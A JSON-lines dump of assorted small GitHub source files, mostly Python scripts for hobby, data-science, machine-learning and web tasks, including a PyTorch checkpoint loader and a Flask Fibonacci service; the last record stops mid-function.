+{"seq_id":"21483173029","text":"class Car:\n    def __init__(self, size, brand, seats):\n        self.color = \"white\"\n        self.size = size\n        self.brand = brand\n        self.seats = seats\n    def paint(self):\n        print(\"What color do you want to paint the car?\")\n        ans = input()\n        self.color = ans\n
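# Usage below: every Car starts out white; paint() prompts on stdin and
# mutates .color in place, so the final print shows whatever was typed.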
car1 = Car(\"medium\", \"toyota\", 4)\ncar1.paint()\nprint(car1.color)\n","repo_name":"notusknot/python-programs","sub_path":"objectoriented.py","file_name":"objectoriented.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"6125156116","text":"import csv\nPremBig6 = [\"Manchester United\", \"Chelsea\", \"Tottenham Hotspur\", \"Manchester City\", \"Arsenal\", \"Liverpool\"]\nChampionsLeagueClub = [\"FC Barcelona\", \"Manchester United\", \"Chelsea\", \"Tottenham Hotspur\", \"Manchester City\", \"Arsenal\", \"Liverpool\", \"Juventus\", \"Paris Saint-Germain\",\n\"Real Madrid\", \"Napoli\", \"Milan\", \"Lazio\", \"Inter\", \"Roma\", \"FC Porto\", \"Valencia CF\", \"FC Bayern München\"]\nGoodValueClubs = [\"Ajax\", \"Stade Rennais FC\", \"LOSC Lille\"]\nwith open('playerdata.csv', encoding=\"utf8\") as csv_file:\n    csv_reader = csv.reader(csv_file, delimiter=',')\n    line_count = 0\n    potentials = []\n    for row in csv_reader:\n        if line_count == 0:\n            line_count += 1\n        elif line_count < 50000:\n            if (row[9] in GoodValueClubs and int(row[3]) < 24 and int(row[3]) > 19):\n                print(f'\\t{row[2]} is {row[3]} years old, and plays for {row[9]}.')\n                potentials.append(row[2])\n            line_count += 1\n    print(f'Processed {line_count} lines.')\n    print(len(potentials))","repo_name":"Reikon95/FootballStats2019","sub_path":"CSVReader.py","file_name":"CSVReader.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"37631627791","text":"from torch.utils.data import Dataset, DataLoader\nfrom torchvision.datasets import CIFAR10\nimport torchvision.transforms as transforms\n\n\ndef load_data(args):\n    train_transform = transforms.Compose([\n        transforms.RandomCrop(32, padding=4),\n        transforms.RandomHorizontalFlip(),\n        transforms.ToTensor(),\n        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n    ])\n    train_dataset = CIFAR10('./data', train=True, transform=train_transform, download=True)\n\n    train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)\n\n    test_transform = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n    ])\n    test_dataset = CIFAR10('./data', train=False, transform=test_transform, download=True)\n\n    test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)\n\n    return train_loader, test_loader","repo_name":"Luhuanz/pytorch_project","sub_path":"transformer/BottleneckTransformers/BottleneckTransformers-main/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"72"}
+{"seq_id":"22170153295","text":"import gym\nfrom gym import spaces\nimport numpy as np\n\nclass GridworldContNormalEnv(gym.Env):\n\n\tdef __init__(self, mean=[0,0,0,0], var=[1,1,1,1]):\n\n\t\tself.DIM = 5\n\t\tself.MAX_SPEED = 1\n\t\tself.END_DISTANCE = 0.75\n\n\t\tself.max_action = np.array([self.MAX_SPEED,self.MAX_SPEED])\n\t\tself.max_position = np.array([self.DIM/2,self.DIM/2,self.DIM/2,self.DIM/2])\n\n\t\tself.observation_space = spaces.Box(-self.max_position, self.max_position, dtype=np.float32)\n\t\tself.action_space = spaces.Box(-self.max_action, self.max_action, dtype=np.float32)\n\n\t\tself.mean = mean\n\t\tself.var = var\n\n\tdef dist(self,p1,p2):\n\t\treturn np.linalg.norm(p1-p2)\n
\n\n\tdef check_end(self,pos,dest):\n\t\tif self.dist(pos,dest) <= self.END_DISTANCE:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\tdef reset(self):\n\t\t\n\t\tx,y = np.random.normal(loc=self.mean[0:2],scale=np.sqrt(self.var[0:2]))\n\t\t#if abs(x)>self.DIM/2 or abs(y)>self.DIM/2:\n\t\t#\tx = np.random.uniform(-2.5,2.5)\n\t\t#\ty = np.random.uniform(-2.5,2.5)\n\n\t\txg,yg = np.random.normal(loc=self.mean[2:4],scale=np.sqrt(self.var[2:4]))\n\t\t#if abs(xg)>self.DIM/2 or abs(yg)>self.DIM/2:\n\t\t#\txg = np.random.uniform(-2.5,2.5)\n\t\t#\tyg = np.random.uniform(-2.5,2.5)\n\n\t\tpos = np.array([x,y],dtype=np.float32)\n\t\tdest = np.array([xg,yg],dtype=np.float32)\n\n\t\twhile self.check_end(pos,dest) or abs(x)>self.DIM/2 or abs(y)>self.DIM/2 or abs(xg)>self.DIM/2 or abs(yg)>self.DIM/2:\n\t\t\tx,y = np.random.normal(loc=self.mean[0:2],scale=np.sqrt(self.var[0:2]))\n\t\t\t#if abs(x)>self.DIM/2 or abs(y)>self.DIM/2:\n\t\t\t#\tx = np.random.uniform(-2.5,2.5)\n\t\t\t#\ty = np.random.uniform(-2.5,2.5)\n\n\t\t\txg,yg = np.random.normal(loc=self.mean[2:4],scale=np.sqrt(self.var[2:4]))\n\t\t\t#if abs(xg)>self.DIM/2 or abs(yg)>self.DIM/2:\n\t\t\t#\txg = np.random.uniform(-2.5,2.5)\n\t\t\t#\tyg = np.random.uniform(-2.5,2.5)\n\n\t\t\tpos = np.array([x,y],dtype=np.float32)\n\t\t\tdest = np.array([xg,yg],dtype=np.float32)\n\n\t\tself.state = np.array([x,y,xg,yg],dtype=np.float32)\n\t\treturn self.state\n\t\n\n\tdef step(self, action):\n\n\t\tassert action.shape == self.action_space.shape\n\n\t\tx,y,xg,yg = self.state\n\t\tpos = np.array([x,y],dtype=np.float32)\n\t\tdest = np.array([xg,yg],dtype=np.float32)\n\t\t\n\t\t# clip action to max_speed\n\t\t#action_norm = np.linalg.norm(action)\n\t\t#action = action if action_norm<=self.MAX_SPEED else action*(self.MAX_SPEED/action_norm)\n\n\t\tdx = action[0]\n\t\tdy = action[1]\n\n\t\tif np.abs(dx) > self.MAX_SPEED:\n\t\t\tdx = dx/np.abs(dx)\n\t\tif np.abs(dy) > self.MAX_SPEED:\n\t\t\tdy = dy/np.abs(dy)\n\n\t\tx += dx\n\t\ty += dy\n\n\t\tnewstate = np.array([x,y,xg,yg],dtype=np.float32)\n\t\tnp.clip(newstate,-self.max_position,self.max_position,newstate)\n\t\tx,y,xg,yg = newstate\n\t\tself.state = newstate\n\n\t\tpos = np.array([x,y],dtype=np.float32)\n\t\tdone = self.check_end(pos,dest)\n\t\tif done:\n\t\t\treward = 0\n\t\telse:\n\t\t\treward = -1\n\t\t\n\t\treturn self.state, reward, done","repo_name":"nondecidibile/cmdp","sub_path":"gym/envs/toy_text/gridworld_cont_normal.py","file_name":"gridworld_cont_normal.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"27459906670","text":"a = input(\"Enter the name of the file with extension: \")\n\nlines=words=chars=0\n\nwith open(a, 'r') as f:\n\tfor line in f:\n\t\tword = line.split()\n\t\tlines+=1\n\t\twords+=len(word)\n\t\tchars+=len(line)\n\nprint(\"Number of Lines = %d\\nNumber of Words = %d\\nNumber of Characters = %d\" % (lines, words, chars))\n","repo_name":"nirmalnishant645/Python-Programming","sub_path":"Practice-Problems/File-Handling/FileStat.py","file_name":"FileStat.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"34744009533","text":"def readfile():\n    infile = open('WorldSeries.txt','r')\n    timeswon = dict()\n    teamwon = dict()\n    year = 1903\n    team = infile.readline()\n    dontskip = True\n    while team != '':\n        team = team.rstrip('\\n')\n        if team in timeswon:\n
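            # team seen before: add one more title to its tally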
            timeswon[team] += 1\n        elif team.startswith('World'):\n            dontskip = False\n        else:\n            timeswon[team] = 1\n        if dontskip:\n            teamwon[year] = team\n            year += 1\n        team = infile.readline()\n        dontskip = True\n    return teamwon,timeswon\ndef main():\n    teamwon, timeswon = readfile()\n    selection = int(input('Choose a year between 1903 and 2009: '))\n    while selection == 1904 or selection == 1994:\n        print('There was no World Series in',selection)\n        selection = int(input('Choose another year:'))\n    print(teamwon[selection],'won the World Series in',selection)\n    print('In total they won',timeswon[teamwon[selection]],'times.')\nmain()","repo_name":"legendbabs/StartingOutWithPython","sub_path":"StartOutWithPython/Chapter09/ProgrammingExercises/world_series2.py","file_name":"world_series2.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
+{"seq_id":"14831618279","text":"from typing import Any, Dict, Optional\n\nimport torch\nimport torch.distributed as dist\n\nfrom .storage import (\n    StorageReader,\n)\nfrom .planner import LoadPlanner\nfrom .default_planner import DefaultLoadPlanner\n\nfrom .utils import _DistWrapper\n\n__all__ = [\"load_state_dict\"]\n\n\ndef load_state_dict(\n    state_dict: Dict[str, Any],\n    storage_reader: StorageReader,\n    process_group: Optional[dist.ProcessGroup] = None,\n    coordinator_rank: int = 0,\n    no_dist: bool = False,\n    planner: Optional[LoadPlanner] = None,\n) -> None:\n    \"\"\"\n    Loads a distributed ``state_dict`` in SPMD style.\n\n    Each rank will try to read the least amount of data necessary\n    to fulfill the requested `state_dict`. When loading :class:`ShardedTensor`\n    instances, each rank only reads data for their local shards.\n\n    .. warning::\n        All tensors in ``state_dict`` must be allocated on their\n        destination device *prior to* calling this function.\n\n        All non-tensor data is loaded using `torch.load()` and modified in place\n        on state_dict.\n\n    .. warning::\n        Users must call `load_state_dict` on the root module to ensure load\n        post-processing and non-tensor data properly propagate.\n\n    .. note::\n        This function can be used for local inference and load a checkpoint\n        produced by ``save_state_dict`` without having a process group initialized\n        by passing ``no_dist=True`` and by using Tensors instead of ShardedTensors.\n\n    Args:\n        state_dict (Dict[str, Any]) : The state_dict to load. Note that this\n            state dict will be updated in place.\n        storage_reader (StorageReader): StorageReader used to load data from.\n        process_group (ProcessGroup):\n            ProcessGroup to be used for cross-rank synchronization.\n        coordinator_rank (int):\n            Rank to use to coordinate the checkpoint.\n            rank0 is used by default.\n        no_dist (bool): If ``True``, distributed checkpoint will not load\n            in SPMD style. (Default: ``False``)\n\n    Returns:\n        None.\n\n    Examples\n        >>> # xdoctest: +SKIP\n        >>> my_model = MyModule()\n        >>> optimizer = Adagrad(my_model.parameters())\n        >>> model_state_dict = my_model.state_dict()\n        >>> fs_storage_reader = torch.distributed.checkpoint.FileSystemReader(\"/checkpoint/1\")\n\n        >>> torch.distributed.checkpoint.load_state_dict(\n        >>>     state_dict=model_state_dict,\n        >>>     storage_reader=fs_storage_reader,\n        >>> )\n\n        >>> # module.load_state_dict() function might have customized steps\n        >>> # to flush the state_dict, must call it to\n        >>> # ensure correct behavior.\n        >>> my_model.load_state_dict(model_state_dict)\n\n    .. 
note::\n load_state_dict uses collectives to coordinate reads across ranks.\n For NCCL-based process groups, internal tensor representations of\n objects must be moved to the GPU device before communication takes place.\n In this case, the device used is given by ``torch.cuda.current_device()``\n and it is the user's responsibility to ensure that this is set so that each\n rank has an individual GPU, via ``torch.cuda.set_device()``.\n \"\"\"\n\n torch._C._log_api_usage_once(\"torch.distributed.checkpoint.load_state_dict\")\n\n distW = _DistWrapper(process_group, not no_dist, coordinator_rank)\n if planner is None:\n planner = DefaultLoadPlanner()\n\n def local_step():\n assert planner is not None\n metadata = storage_reader.read_metadata()\n planner.set_up_planner(state_dict, metadata, distW.is_coordinator)\n storage_reader.set_up_storage_reader(metadata, distW.is_coordinator)\n\n local_plan = planner.create_local_plan()\n local_plan = storage_reader.prepare_local_plan(local_plan)\n return local_plan\n\n def global_step(all_local_plans):\n assert planner is not None\n all_local_plans = planner.create_global_plan(all_local_plans)\n all_local_plans = storage_reader.prepare_global_plan(all_local_plans)\n return all_local_plans\n\n central_plan = distW.reduce_scatter(\"plan\", local_step, global_step)\n\n def read_data():\n assert planner is not None\n final_local_plan = planner.finish_plan(central_plan)\n all_reads = storage_reader.read_data(final_local_plan, planner)\n\n all_reads.wait()\n return None\n\n _ = distW.all_gather(\"read\", read_data)\n","repo_name":"pytorch/pytorch","sub_path":"torch/distributed/checkpoint/state_dict_loader.py","file_name":"state_dict_loader.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"16653929100","text":"import random\nfrom functools import wraps\nfrom string import ascii_letters\n\n\ndef lower_string(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n return result.lower()\n return wrapper\n\ndef shorten_string(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n return result[:40]\n return wrapper\n\ndef title_string(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n return result.title()\n return wrapper\n\n\n\n@title_string\n@lower_string\n@shorten_string\ndef random_string():\n random_string = \"\"\n characters = ascii_letters + \" . , ! 
?\"\n    for _ in range(random.randint(7,70)):\n        random_string += random.choice(characters)\n    return random_string\n\n\n\nif __name__ == \"__main__\":\n    print(\"-\".ljust(40, \"-\"))\n    for _ in range(7):\n        print(random_string())\n    print(\"-\".ljust(40, \"-\"))","repo_name":"solomoniosif/SDA_Python_Exercises","sub_path":"13_2_21_python_intermediate/exercise_01.py","file_name":"exercise_01.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"29142722162","text":"# main.py\nimport discord\nfrom discord.ext import commands\nimport os\n\ndef main2():\n    prefix = '!'\n    intents = discord.Intents.all()\n\n    client = commands.Bot(command_prefix=prefix, intents = intents)\n\n    for filename in os.listdir('file path'):\n        if '.py' in filename:\n            filename = filename.replace('.py', '')\n            client.load_extension(f\"command.{filename}\")\n\n    with open('token file path', 'r') as f:\n        token1 = f.read()\n    \n\n    client.run(token1) # If an error occurs here, go to the Discord bot settings and check them -- important!!\n\nif __name__ == '__main__':\n    main2()\n","repo_name":"Magin-a/Codeuniv","sub_path":"백준고양이 봇/DAY1.py","file_name":"DAY1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"51082229","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom search.martylib.protobuf_utils.patch import patch_enums\nfrom search.martylib.test_utils import TestCase\n\n\nclass TestPatch(TestCase):\n    def test_patch_enums(self):\n        from search.martylib.proto.structures import test_pb2\n\n        patch_enums()\n\n        self.assertEqual(\n            getattr(test_pb2.TopLevelEnum, 'NULL'),\n            0,\n        )\n        self.assertEqual(\n            getattr(test_pb2.Alpha.AlphaNestedEnum, 'N_NULL'),\n            0,\n        )\n\n        # Make sure values from different enums aren't mixed.\n        self.assertFalse(\n            hasattr(test_pb2.TopLevelEnum, 'N_NULL')\n        )\n        self.assertFalse(\n            hasattr(test_pb2.Alpha.AlphaNestedEnum, 'NULL')\n        )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search engine/test_protobuf_utils/test_patch.py","file_name":"test_patch.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"33006412289","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nclass DateSelection():\n    def selected_date(self):\n        baseurl='https://www.expedia.com'\n        driver=webdriver.Chrome()\n        driver.maximize_window()\n        driver.implicitly_wait(10)\n        driver.get(baseurl)\n        clickCale=driver.find_element(By.ID,\"d1-btn\")\n        clickCale.click()\n        # selecDate=driver.find_element(By.XPATH,\"//button[contains(@data-day,'22') and contains(@aria-label,'Jul')][1]\")\n        # selecDate.click()\n        self.DateS=driver.find_element(By.XPATH,\"//button[contains(@data-stid,'apply-date-picker')and contains(text(),'Done')]\")\n        self.DateS.click()\n        time.sleep(3)\n        driver.quit()\n\n\n\nob=DateSelection()\nob.selected_date()","repo_name":"diyarammb/scrape_date_of_calender_using_python","sub_path":"Calender_selection.py","file_name":"Calender_selection.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"5067593288","text":"import sys\nimport itertools\nimport subprocess\nimport numpy as np\nfrom datetime import datetime\nfrom dateutil.relativedelta import 
relativedelta\nfrom shutil import rmtree\nfrom os import environ, mkdir, path\nimport tabulate_results\n\n\nget_results_only = False\n\nswitch_gpus = False #For multiple GPUs\nn_parallel_threads = 16\n\n# Set Hyper-parameters\nargs = dict()\n# The names should be the same as argument names in parser.py\nargs['hyper_params'] = ['dataset','lr', 'l2','drop_in', 'drop_out', 'wce']\ncustom = '_5_'\nnow = datetime.now()\nargs['timestamp'] = str(now.month)+'|'+str(now.day)+'|'+str(now.hour)+':'+str(now.minute)+':'+str(now.second) + custom # '05|12|03:41:02' # Month | Day | hours | minutes (24 hour clock)\n\nargs['dataset'] = ['facebook', 'amazon']\nargs['lr'] = [1e-2]#, 1e-5]\nargs['l2'] = [1e-2, 1e-4]#, 1e-5]\nargs['drop_in'] = [0.25]#, 0.5]\nargs['drop_out'] = [0.5]\nargs['wce'] = [1]\n\npos = args['hyper_params'].index('dataset')\nargs['hyper_params'][0], args['hyper_params'][pos] = args['hyper_params'][pos], args['hyper_params'][0]\n\n\nif not get_results_only:\n def diff(t_a, t_b):\n t_diff = relativedelta(t_a, t_b)\n return '{h}h {m}m {s}s'.format(h=t_diff.hours, m=t_diff.minutes, s=t_diff.seconds)\n\n # Create Args Directory to save arguments\n args_path = 'args'\n if not path.exists(args_path):\n mkdir(args_path)\n np.save(path.join('args', args['timestamp']), args)\n\n #Create Log Directory for stdout Dumps\n stdout_dump_path = 'stdout_dumps'\n if not path.exists(stdout_dump_path ):\n mkdir(stdout_dump_path)\n\n param_values = []\n this_module = sys.modules[__name__]\n for hp_name in args['hyper_params']:\n param_values.append(args[hp_name])\n combinations = list(itertools.product(*param_values))\n n_combinations = len(combinations)\n print('Total no of experiments: ', n_combinations)\n\n pids = [None] * n_combinations\n f = [None] * n_combinations\n last_process = False\n for i, setting in enumerate(combinations):\n #Create command\n command = \"python __main__.py \"\n folder_suffix = args['timestamp']\n for name, value in zip(args['hyper_params'], setting):\n command += \"--\" + name + \" \" + str(value) + \" \"\n if name != 'dataset':\n folder_suffix += \"_\"+str(value)\n command += \"--\" + \"folder_suffix \" + folder_suffix\n print(i+1, '/', n_combinations, command)\n\n if switch_gpus and (i % 2) == 0:\n env = dict(environ, **{\"CUDA_DEVICE_ORDER\": \"PCI_BUS_ID\", \"CUDA_VISIBLE_DEVICES\": \"1\"})\n else:\n env = dict(environ, **{\"CUDA_DEVICE_ORDER\": \"PCI_BUS_ID\", \"CUDA_VISIBLE_DEVICES\": \"0\"})\n\n name = path.join(stdout_dump_path, folder_suffix)\n with open(name, 'w') as f[i]:\n pids[i] = subprocess.Popen(command.split(), env=env, stdout=f[i])\n if i == n_combinations-1:\n last_process = True\n if ((i+1) % n_parallel_threads == 0 and i >= n_parallel_threads-1) or last_process:\n if last_process and not ((i+1) % n_parallel_threads) == 0:\n n_parallel_threads = (i+1) % n_parallel_threads\n start = datetime.now()\n print('########## Waiting #############')\n for t in range(n_parallel_threads-1, -1, -1):\n pids[i-t].wait()\n end = datetime.now()\n print('########## Waiting Over######### Took', diff(end, start), 'for', n_parallel_threads, 'threads')\n\n # Tabulate results in xls\n tabulate_results.write_results(args)\n\nelse:\n tabulate_results.write_results(args)\n print(\"DOne tabulation\")\n\n","repo_name":"PriyeshV/DCI","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23658409424","text":"#!/usr/bin/env python\n# Python Network 
Programming Cookbook, Second Edition -- Chapter - 7\n# This program is optimized for Python 2.7.12 and Python 3.5.2.\n# It may run on any other version with/without modifications.\n\nfrom flask import Flask\napp = Flask(__name__)\n\n@app.route('/')\ndef index(num=1):\n    return \"Your Python Web Service Fibonacci(\"+ str(num) + \"): \"+ str(fibonacci(num))+ \" Square(\"+ str(num) + \"): \"+ str(square(num))\n\ndef fibonacci(n):\n    if n == 0:\n        return 0\n    elif n == 1:\n        return 1\n    else:\n        return fibonacci(n-1) + fibonacci(n-2)\n\n\ndef square(n):\n    print (\"Calculating for the number %s\" %n)\n    return n*n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"PacktPublishing/Python-Network-Programming-Cookbook-Second-Edition","sub_path":"Chapter07/7_7_create_restful_webservice.py","file_name":"7_7_create_restful_webservice.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"72"}
+{"seq_id":"3601177449","text":"import os\r\nrootdir = r'C:/Users/xiaoji/Desktop/result/result1'\r\n\r\nfor a,b,filenames in os.walk(rootdir):\r\n    tk = r'domain-go.jp'\r\n    # iterate over a copy: removing from the list being iterated skips entries\r\n    for filename in list(filenames):\r\n        if filename.find(tk)==-1:\r\n            filenames.remove(filename)\r\n\r\nfor filename in filenames:\r\n    fname = rootdir+r'/'+filename\r\n    f = open(fname,'r+')\r\n    data = f.read()\r\n    f.close()\r\n    data = data.replace(r'/warc/',r'/wet/')\r\n    data = data.replace(r'.warc.gz','.warc.wet.gz')\r\n    data = data.replace(r'crawl-data' , 'https://commoncrawl.s3.amazonaws.com/crawl-data')\r\n    f = open(fname,'w+')\r\n    f.write(data)\r\n    f.close()\r\n","repo_name":"lli130/Crawl-web-pages-from-CommonCrawl","sub_path":"warc3.py","file_name":"warc3.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"7355223182","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom compareIslands import *\n\ndef compressColumns(df):\n\n    #establish shortest column and grab its name\n    shortestCol = 100000\n    shortestColName = \"\"\n    for col in df.columns:\n        if df[col].count() < shortestCol: \n            shortestCol = df[col].count()\n            shortestColName = col\n\n\n    #remove values and avg their neighbors against it to preserve movement. \n    for col in df.columns:\n        diff = df[col].count()-shortestCol\n        if diff != 0:\n\n            #generate a list to get the incrementing values\n            nthF = df[col].count()/diff\n            nth = int(nthF)\n            colSeries = df[col]\n            nthCounter = 0\n            nthList = []\n            \n            #calculate avgs and delete rows\n            for i in range(len(colSeries)):\n\n                #count according to the incrementor, and round down. 
Add it to the List\n # - if i is in List, then perform our functions on it.\n nthCounter += nthF\n nthList.append(round(nthCounter))\n if i in nthList and i < len(df[shortestColName]):\n if i != 0 and i != len(df[shortestColName])-1:\n avgLower = (colSeries[i]+colSeries[i-1])/2\n avgUpper =(colSeries[i]+colSeries[i+1])/2\n colSeries.loc[i-1]= avgLower\n colSeries.loc[i+1] = avgUpper\n colSeries = colSeries.drop(index=i)\n elif i == 0:\n avg=(colSeries[i]+colSeries[i+1])/2\n colSeries.loc[i+1] = avg\n colSeries = colSeries.drop(index=i)\n else:\n avg=(colSeries[i]+colSeries[i-1])/2\n colSeries.loc[i-1]= avg\n colSeries = colSeries.drop(index=i)\n\n #reindex the column giving it the effect as if we removed the values and smashed it to match the shortest column\n oldIndex = list(colSeries.index)\n newIndex = list(df[shortestColName].index)\n indexDict = dict(zip(oldIndex,newIndex))\n\n print(colSeries.count())\n colSeries = colSeries.rename(index=indexDict)\n df[col] = colSeries\n return df\n\nislandDfs[2].to_csv(\"/Users/abram/Documents/PCC/perceptionAnalyzer/islandsDfs[0].csv\")\ncompressColumns(islandDfs[2]).to_csv(\"/Users/abram/Documents/PCC/perceptionAnalyzer/islandsDfs[0]Compressed.csv\")\n\n#plt.show()","repo_name":"abrhim/pcc-perceptionAnalaysis","sub_path":"compression.py","file_name":"compression.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9464296071","text":"#https://www.acmicpc.net/problem/17210\n\ndoors = int(input())\nnum = int(input()) # 0: push 1: pull\n\nif doors > 5:\n print(\"Love is open door\")\n\nelse:\n for i in range(1, doors):\n print((num+i)%2)\n","repo_name":"yewonleee/AlgorithmProblemSolving","sub_path":"python/week1/3-4_이예원_20210709.py","file_name":"3-4_이예원_20210709.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14092780096","text":"import pyttsx3\nimport speech_recognition as sr\nimport datetime\nimport wikipedia\nimport webbrowser\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[0].id)\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n \ndef wish():\n hour = datetime.datetime.now().hour\n if hour in range(0,12):\n speak(\"Good Morning\")\n elif hour in range(12,18):\n speak(\"Good Afternoon\")\n else:\n speak(\"Good Evening\")\n speak(\"I am rubic.\")\n\ndef takeCommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening......\")\n r.pause_threshold = 0.5\n audio = r.listen(source)\n try:\n print(\"Recognizing.........\")\n query = r.recognize_google(audio,language='en-in')\n print(f\"User said :{query}\\n\")\n\n except Exception as e:\n print(\"say that again please.....\")\n return \"None\"\n return query\n\nif __name__ == \"__main__\":\n wish()\n\n while True:\n query = takeCommand().lower()\n\n # wikipedia logic\n if 'wikipedia' in query:\n speak(\"searching wikipedia....\")\n query = query.replace(\"wikipedia\",\"\")\n results = wikipedia.summary(query,sentences=2)\n print(results)\n speak(results)\n\n # for opening website in browser\n elif \"open youtube\" in query:\n webbrowser.open(\"youtube.com\")\n elif \"open google\" in query:\n 
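            # The same pattern extends to any site; a hypothetical extra
            # branch (site name is a placeholder, not from the original):
            #   elif "open github" in query:
            #       webbrowser.open("github.com")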
webbrowser.open(\"google.com\")","repo_name":"Rohit-Gupta11/Basic-Virtual-Asistent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11628116105","text":"# -*- coding: utf-8 -*-\n# (c) 2020 Praxya - Aitor Rosell Torralba \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom odoo import models, fields, api, http\nfrom pyfcm import FCMNotification\n\n\nclass ResCompany(models.Model):\n    _inherit = \"res.company\"\n\n    push_service_object = False\n\n    @api.multi\n    def push_service(self):\n        self.ensure_one()\n        if not self.push_service_object:\n            self.push_service_object = FCMNotification(api_key=\"ANONYM\")\n        return self.push_service_object\n\n    app_api_key = fields.Char(default=\"ANONYM\", string=\"API KEY de la App\")\n    app_private_key = fields.Char(default=\"ANONYM\", string=\"PRIVATE KEY de la App\")\n    app_url = fields.Char(default=\"ANONYM\", string=\"URL de la App\")\n\n","repo_name":"takashi1kun/aitor-odoo-stuff","sub_path":"anonbussiness_app_api/models/res_company.py","file_name":"res_company.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"614621266","text":"import requests, os, asyncio, aiofiles, time, imageio\nfrom aiohttp import ClientConnectionError, ClientSession\n\nstart = time.time()\n\nif os.path.exists('rilla_assets.txt'):\n    with open('rilla_assets.txt') as f:\n        assets = set(map(int, f.read().split(', ')))\nelse:\n    creators = ['PO4CEJB6IV2P5UACZ3P77KJCITMX2ZIT6RMW4WTX6JQGJYNJS6T5E4V27Q', 'MPRRGD2IXHYNHRMOFD5AE6Y2KK6DL32GKDFIZG7SC6TYO6AKK7CZSSBKTA','2QDW33WUCFKDNEZEZPBF7MCJUOFWOTOPAL64NHHVXUXE5B6L5VKQMPYZXA']\n    assets = set()\n\n    for creator in creators:\n        url = f'https://algoindexer.algoexplorerapi.io/v2/assets?creator={creator}'\n        data = requests.get(url).json()\n        while 'next-token' in data:\n            for asset in data['assets']:\n                assets.add(asset['index'])\n            data = requests.get(url+f'&next={data[\"next-token\"]}').json()\n\n    with open('rilla_assets.txt', 'w') as outfile:\n        data = str(assets)[1:-1]\n        outfile.write(data)\n\n\nwallet = 'GCDW4TJFIDZZJME4NYUWSQWYGEUDSNSMMEQ4JYH7PM7CRQAUXTJFDDOC2A'\nwallet_url = f'https://algoindexer.algoexplorerapi.io/v2/accounts/{wallet}'\nwallet_data = requests.get(wallet_url).json()\nrillas = set()\nfor asset in wallet_data['account']['assets']:\n    if asset['asset-id'] in assets and asset['amount'] == 1:\n        rillas.add(asset['asset-id'])\n\nasync def fetch_rilla(wallet, rilla_id, session):\n    rand_url = f'https://www.randgallery.com/cdn-cgi/image/height=512,quality=80,format=auto,onerror=redirect/cache/images/{rilla_id}.png?v2'\n    file_name = f'{wallet}/{rilla_id}.jpeg'\n    try:\n        resp = await session.request(method='GET', url=rand_url)\n        async for data in resp.content.iter_chunked(1024):\n            async with aiofiles.open(file_name, \"ba\") as f:\n                await 